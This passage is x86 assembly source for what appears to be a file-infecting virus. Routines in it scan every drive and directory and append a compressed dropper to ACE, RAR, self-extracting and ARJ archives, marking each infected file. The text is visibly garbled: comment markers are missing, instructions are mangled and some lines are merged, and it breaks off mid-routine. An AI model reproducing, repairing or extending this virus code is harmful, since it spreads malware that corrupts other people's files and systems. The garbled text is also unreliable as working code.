Call [EBP DDGETSYSTEMTIME]; GET ACTUAL TIME
MOV EAX, Search_Mem_Size; Size of Mem for Searching
Call malloc
JZ Init_Search_ERROR; WERE WE SUCESSFUL?
MOV [EBP SEARCH_ADDRESS], EAX
MOV EAX, 005C3A43H; 'C: // 0'
MOV DWORD PTR [EBP Search_FileName], EAX
__searching:
MOV BYTE PTR [EBP Search_plunge], 00H
JMP Search_all_DIRS
__searching_end:
CMP BYTE PTR [EBP Search_FileName], 'Z'
JZ Init_Search_done
Inc Byte PTR [EBP Search_FileName]
MOV Word PTR [EBP Search_FileName 2], 005CH
What Disk is it? fixed? CD-ROM? RAM-DISK? ETC.?
MOV CL, 'A'
SUB CL, [EBP Search_FileName]
NEG CL
MOV EAX, 00000001H
SHL Eax, Cl; Convert to BCD
TEST [EBP GDT_FLAGS], EAX
JNZ __SEARCHING; May i "use" this disk?
JMP __Searching_end; uaaaaah, I'm crazy ... :)
INIT_SEARCH_EXIT:
MOV ECX, DWORD PTR [EBP Search_Address]
Call Mdealloc; DEAllocate Memory
INIT_SEARCH_ERROR:
POPA; RESTORE All REGZ
RET
INIT_SEARCH_DONE:; ALL Disks Infected?
Call hookhyperinfection_done; remove timer
JMP init_Search_exit
Search_all_dirs:
Lea EBX, [EBP HYPERTABLE]
Search_all_dirs_continue:
Call __add_filename; add filename or extension
Call __calc_in_mem; Offs DTA in Mem to ESI
Lea Edx, [EBP Search_FileName]
Call __myfindfirst
MOV [ESI-SIZE Search_Handle], Eax; Save Handle
JC __FIND_DIR; Error?
__repeat:
Call __clean; delete extension
PUSH ESI
Lea ESI, [ESI] .dta_filename; and add file name
@copysz; Copy with Zero Char
POP ESI; Restore ESI = DTA IN MEMORY
Lea Eax, [EBP SEARCH_FILENAME]
MOV [EBP FileName_ptr], EAX
__final_softice_1: NOP
NOP
; int 4; Final Softice Breakpoint
MOV EAX, [EBX-00000004H]; Input Value
Push DWORD PTR [EBX-00000008H]
Add [ESP], EBP; This Was Ghastly Bug!
Call [ESP]; CALL FUNCTION
POP EAX
Push Word PTR [EBP TIME.WSECOND]
Lea Eax, [EBP TIME]; GIVE TIME OTHER APPZ
Push EAX
Call [EBP DDGETSYSTEMTIME]
POP CX
MOV [EBP Search_Table], EBX; Position in Hypertable
CMP CX, [EBP TIME.WSECOND]; OUT OF TIME?
JNZ Init_Search_ERROR
__continue:
Call __calc_in_mem; ESI = DTA IN MEMORY
MOV Eax, [ESI-size Search_Handle]; Handle of Findfirstfile
Call __myfindnext
JNC __Repeat
Call __myfindclose
__find_dir:
Call __clean; remove file name / extension
CMP BYTE PTR [EBX], 0FFH; Last File Name?
JNZ Search_all_dirs_continue
__find_dir_continue:
MOV [EDI], 002A2E2AH; Add '*. *', 0
Call __calc_in_mem
Lea Edx, [EBP Search_FileName]
Call __myfindfirst; Search Directory "ONLY"
MOV [ESI-size Search_Handle], EAX
JC __Search_exit
__find_in_dir:
TEST [ESI] .dta_fileattr, 10h; Is IT Directory?
JZ __FIND_NEXT
CMP [ESI] .dta_filename, '.'; IT CAN't Be Directory
JZ __FIND_NEXT
Inc Byte PTR [EBP Search_Plunge]
Call __get_last_char; edi = last char of filename
LEA ESI, [ESI] .dta_filename; ESI = filename
Call __clean; remove extension
@COPysz; Copy Directory Name and
Mov Word PTR [EDI-1], 005CH; SET '/' AT THE END
JMP Search_all_dirs; Search in New Directory
__find_next:
Call __calc_in_mem
MOV EAX, [ESI-size Search_Handle]
Call __myfindnext
JNC __find_in_dir
__search_exit:
Call __clean; remove file name and '/'
MOV BYTE PTR [EDI-1], 00h; It's Out of Directory
Dec byte PTR [EBP Search_Plunge]
CMP BYTE PTR [EBP Search_FileName 2], 00HJZ __SEARCHING_END
JMP __find_next
__calc_in_mem:; Get Pointer to DTA IN MEMORY
Movzx ESI, BYTE PTR [EBP Search_plunge]
Imul ESI, SIZE DTA SIZE Search_Handle
Add ESI, [EBP Search_Address]
Add ESI, SIZE Search_Handle
RET
__add_filename:; add f.n. or ney by hypertable
Call __get_last_char
CMP BYTE PTR [EBX], 00H; ONLY EXTENSION?
JNZ __AF_FULLLCOPY
MOV EAX, [EBX 1]; load extension
MOV BYTE PTR [EDI], 2AH; '*'
MOV [EDI 1], EX; and Extension
MOV BYTE PTR [EDI 5], 00H; ZERO BYTE
Add ebx, Hypertable_Ondesize
CMP Byte Ptr [EBX - /
Hypertable_halfsize], 00H; Search this extension?
JZ __AFF_FINISH
POP EAX
JMP __FIND_DIR
__AFF_FINISH:
RET
__af_fullcopy:
Inc EBX
Mov Al, Byte PTR [EBX]; Load FileName's Char
MOV [EDI], Al
Inc EDI
OR Al, Al; End Of FileName?
JNZ __AF_FULLLCOPY
Add Ebx, Hypertable_HalfSize 1; 1 Means ZERO BYTE
CMP Byte Ptr [EBX - /
Hypertable_halfsize], 00H; Search this filename?
JZ __AFF_FINISH
POP EAX
JMP __FIND_DIR
__GET_LAST_CHAR:; EDI = Last Char 1 in FileName
Lea Edi, [EBP Search_FileName]
Mov ECX, FileName_Size
XOR Al, Al
CLD
RepNZ scaSB
Dec Edi
RET
__clean:; Clean Last Item in FileName
Lea Edx, [EBP Search_FileName]
Call __get_last_char
__2: MOV BYTE PTR [EDI], 0
Dec Edi
CMP Byte PTR [EDI], '/'
JNZ __2
Inc EDI
RET
What is the thumb infread in Ace / Rar And Ace / Rar EXE-SFX Archivez?
; ------------------------------------------------- ------------
This Function Scans Input EXE File WHETER IT IS Not SFX
For RAR (DOS, W32) OR for ACE (DOS, WIN32 - German / ENGLISH)
If Yes, I will put compressed dropper in the end of file.
Why That? See On "INFECT_ACE:" Comment for more info. "
__ISFX_FHANDLE DD 00000000H; File's Handle
__ISFX_FMEMORY DD 00000000H; File's HEADERS
__isfx_ncompare DD 00000000H; Comparing Places
;
Infect_ace_rar:
; Open INPUT FILE
MOV EDX, [EBP FileName_ptr]
Call __myopenfile
JC __ISFX_FINISH
MOV [EBP __ISFX_FHANDLE], EAX
Allocate Memory for Comparing
Mov Eax, 10000H
Call malloc
MOV [EBP __ISFX_FMEMORY], EAX
WE Must Search Certain Bytes on Certain File Position
MOV [EBP __ISFX_NCompare], 7; Six! Comparing
__isfx_search_1:
Dec [EBP __ isfx_ncompare]
JZ __ISFX_SEND
Lea EBX, [EBP Archive_magicwhere]
__ISFX_MAGIC_OKAY:
MOV EAX, [EBP __ isfx_ncompare]
Imul Eax, 00000004H
Add Ebx, EAX
Movzx ECX, Word PTR [EBX-0002H]; ECX = bytes to Read
Movzx ESI, Word PTR [EBX-0004H]; ESI = File POS
Now, I Will Read DataS
MOV EDX, [EBP __ isfx_fmemory]; Allocated Place
MOV EBX, [EBP __ isfx_fhandle]
Call __myreadfile; i can't check error!
Prepare TO SCAN
MOV EDI, [EBP __ isfx_fmemory]
MOV EBX, EDI
Add EBX, ECX; End of Memory Buffer
__isfx_search_2:
CMP EDI, EBX
JA __ISFX_Search_1
; Search Archive's Signatures
LEA ESI, [EBP RAR_MAGIC]; No, ESI = RAR_MAGIC
MOV ECX, RAR_MAGIC_LENGTH; and ITS SIZE
CMP [EBP __ISFX_NCompare], 00000004H
JAE __ISFX_S2_CONTINUE; Is IT Really Rar?
Lea ESI, [EBP ACE_MAGIC]; ESI = ACE_MAGIC
MOV ECX, ACE_MAGIC_LENGTH; and ITS Size
__ISFX_S2_CONTINUE:
CLD
Repare Magics; Compare Magics
JNZ __ISFX_Search_2; Shit, WE Must Search On Other Place
Position on Header's Start
SUB EDI, RAR_MAGIC_LENGTH
CMP [EBP __ISFX_NCompare], 00000004H
Jae __isfx_h_read
SUB EDI, 2 * ACE_MAGIC_LENGTH-RAR_MAGIC_LENGTH
__isfx_h_read:
Check Multivolume Flag
CMP [EBP __ISFX_NCompare], 00000004H
Jae __isfx_mf_rar
Test Word PTR [EDI ACEHHEADFLAGS-ACE_H_STRUCT], 2048
JMP __ISFX_MF_FINISH
__isfx_mf_rar:
Test Word PTR [EDI RARFILEFLAGS-RARSIGNATURE], 0001H
__ISFX_MF_FINISH:
JNZ __ISFX_SEND
Call "Child" functions, set certain input parameters, SET CERTAIN INPUT Parameters
MOV EAX, [EBP __ isfx_fhandle]
MOV [EBP __ IACR_FHANDLE], EAX; Modify Handle
MOV [EBP __ IACR_TYPE], __ Iacr_Trar; Yeah, Rar Archive
CMP [EBP __ISFX_NCompare], 00000004H
Jae __isfx_cc_finish
MOV [EBP __ IACR_TYPE], __ IACR_TACE; YEAH, ACE ARCHIVE
__ISFX_CC_FINISH:
MOV EBX, [EBP __ isfx_fhandle]; Check WHether SFX
Call __get_archive_infected; archive has been
JC __Isfx_fclose; infected
Call __iacr_child_function; Call Main Function
JMP __ISFX_FINISH; TO INFECT ACE or RAR
__isfx_send:
Call __isfx_fclose
STC
RET
__isfx_fclose:
MOV EBX, [EBP __ isfx_fhandle]
Call __myclosefile
__isfx_finish:
CLC
RET
What is the thumb infread in ace, and is Rar Archivez? Where is Xiyomo? Where are you?
; ------------------------------------------------- ------------
This Function Infects Ace and Rar Archivez. Unfortunately
I can't my Dropper place Inside Archive 'Cause IF ARCHIVE
Is Solid Type Resulting Archive Won't oay. Yes, this was
Shock for me. But if archive isn't solid all will be okay
AlthRough this Method Is Not Support here. so, my dropper
Is Compressed But in The end of file.
;
; Input: filename_ptr ... Pointer to an Arj's FileName
NEWARJ STRUC ... HAS BEEN FILLED? I DONT KNOW!
;
Output: Nothing
;
__iacr_fhandle dd 00000000h; Archive's Handle
__iacr_dhandle dd 00000000h; Dropper's Handle
__iacr_dmemory dd 00000000H; Dropper's Body
;
__iacr_type DD 00000000H; Ace or Rar? __ IACR_TACE EQU 00H; ACE SIGNATURE
__iacr_trar EQU 01H; Rar Signature
;
Infect_ace: MOV [EBP __ IACR_TYPE], __ Iacr_Tace; Yeah, Ace Archive
JMP infect_acr
Infect_rar: MOV [EBP __ IACR_TYPE], __ Iacr_trar; Yeah, Rar Archive
Here, Common Functions is starting ...
Infect_acr:
Check WHETHER DROPPER EXISTS
MOV EAX, [EBP __ IACR_TYPE]; GET Archive Type
Imul Eax, Size Aprogram
CMP [EBP EAX NEWACE.DROPPER], 00000000h
JZ __IACR_FINISH; Does Dropper EXISTS?
; Open Archive File
MOV EDX, [EBP FileName_ptr]
Call __myopenfile
JC __IACR_FINISH
MOV [EBP __ IACR_FHANDLE], EAX
Check WHETHER Archive Has Been Infected
MOV EBX, [EBP __ IACR_FHANDLE]
Call __get_archive_infected
JC __IACR_FCLOSE
Read Archive Header
CMP DWORD PTR [EBP OFFSET __IACR_TYPE], __ IACR_TACE
JNZ __IACR_RAR_1
Lea Edx, [EBP ACE_H_STRUCT]; Destination Place
MOV ECX, Aceneededbytes
JMP __IACR_END_1
__iacr_rar_1:
LEA EDX, [EBP RARSIGNATURE]; Destination Place
MOV ECX, Rarsignature_Length /
Rarneededbytes; Number of Bytes to Read
__iacr_end_1:
XOR ESI, ESI
MOV EBX, [EBP __ IACR_FHANDLE]
Call __myreadfile
JC __IACR_FCLOSE
Check Archive's Header
CMP DWORD PTR [EBP OFFSET __IACR_TYPE], __ IACR_TACE
JNZ __IACR_RAR_2
CMP DWORD PTR [EBP ACEHSIGNATURE], 'CA **'
JNZ __IACR_FCLOSE; The 1st Part of Sign
CMP Word PTR [EBP ACEHSIGNATURE 100004H], '* e'
JNZ __IACR_FCLOSE; The 2nd Part
Test Word PTR [EBP ACEHHEADFLAGS], 2048
JNZ __IACR_FCLOSE; MULTIVOLUME FLAG?
JMP __IACR_END_2
__iacr_rar_2:
CMP DWORD PTR [EBP RARSIGNATURE], '! RAR'
JNZ __IACR_FCLOSE
CMP Word PTR [EBP RARSIGNATURE 100004H], 071AH
JNZ __IACR_FCLOSTEST WORD PTR [EBP RARFILEFLAGS], 0001H
JNZ __IACR_FCLOSE; MULTIVOLUME FLAG?
__iacr_end_2:
Open Dropper file
__IACR_CHILD_FUNCTION:
MOV EDX, [EBP __ IACR_TYPE]; Get Archive Type
Imul EDX, SIZE APROGRAM
MOV EDX, [EBP EDX NEWACE.DROPPER]
OR EDX, EDX; ONCE AGAIN TEST:
JZ __IACR_FINISH; Does Dropper EXISTS?
Call __myopenfile
JC __IACR_FCLOSE
MOV [EBP __ IACR_DHANDLE], EAX
Get Dropper's File Size
Mov EBX, [EBP __ IACR_DHANDLE]
Call __mygetfilesize
MOV ECX, EAX
; Allocate Memory For Dropper's File Body
Call malloc
MOV [EBP __ IACR_DMEMORY], EAX
Read Whole Dropper's Body
MOV EDX, [EBP __ IACR_DMEMORY]; Destination BUFFER
XOR ESI, ESI; File Position
MOV EBX, [EBP __ IACR_DHANDLE]; DROPPER's HANDLE
Call __myreadfile
JC __IACR_DCLOSE
Get Archive File Size
MOV EBX, [EBP __ IACR_FHANDLE]
Call __mygetfilesize
Mov ESI, EAX
"Update" Archive File By My Dropper
CMP DWORD PTR [EBP OFFSET __IACR_TYPE], __ IACR_TACE
JNZ __IACR_RAR_3
Movzx Eax, Word PTR [EDX ACEHHEADSIZE-ACE_H_STRUCT]
Add Eax, 00000004H
JMP __IACR_END_3
__iacr_rar_3:
Movzx Eax, Word PTR [Edx Rarheadersize-Rarsignature]
Add Eax, Rarsignature_Length
__iacr_end_3:
Add Edx, Eax; Header Take Away
Sub ECX, EAX; WITHOUT Main Header, please
MOV EBX, [EBP __ IACR_FHANDLE]
Call __mywritefile; write my dropper, uaaah :)
Archive Has Been Infected
MOV EBX, [EBP __ IACR_FHANDLE]
Call __set_archive_infected
__iacr_dclose:
Mov EBX, [EBP __ IACR_DHANDLE]
Call __myclosefile
__iacr_dealloc:
MOV EAX, [EBP __ IACR_DMEMORY]
Call Mdealloc
__iacr_fclose:
MOV EBX, [EBP __ IACR_FHANDLE]
Call __myclosefile
__iacr_finish:
RET
Where is the thumb infread in arj archivez? Where is Xomo know and know and know? ----------------------- ------------------------------------
This function infect arj archivez by my prepared Dropper.
Dropper is compressed by Arj (Four Method WITHOUT).
;
; Input: filename_ptr ... Pointer to an Arj's FileName
NEWARJ STRUC ... 'S BEEN FILLED? I DONT KNOW!
;
Output: Nothing
;
__iarj_fhandle dd 00000000h; Archive's Handle
__IARJ_FFILES DD 00000000H; Number of Files
__iarj_dhandle DD 00000000H; Dropper's Handle
__iarj_dmemory DD 00000000H; Dropper's File Body
;
Infect_arj:
XOR EAX, EAX
MOV [EBP __ IARJ_FFILES], EAX
Check WHETHER DROPPER EXISTS
CMP [EBP NEWARJ.DROPPER], 00000000H
JZ __IARJ_FI
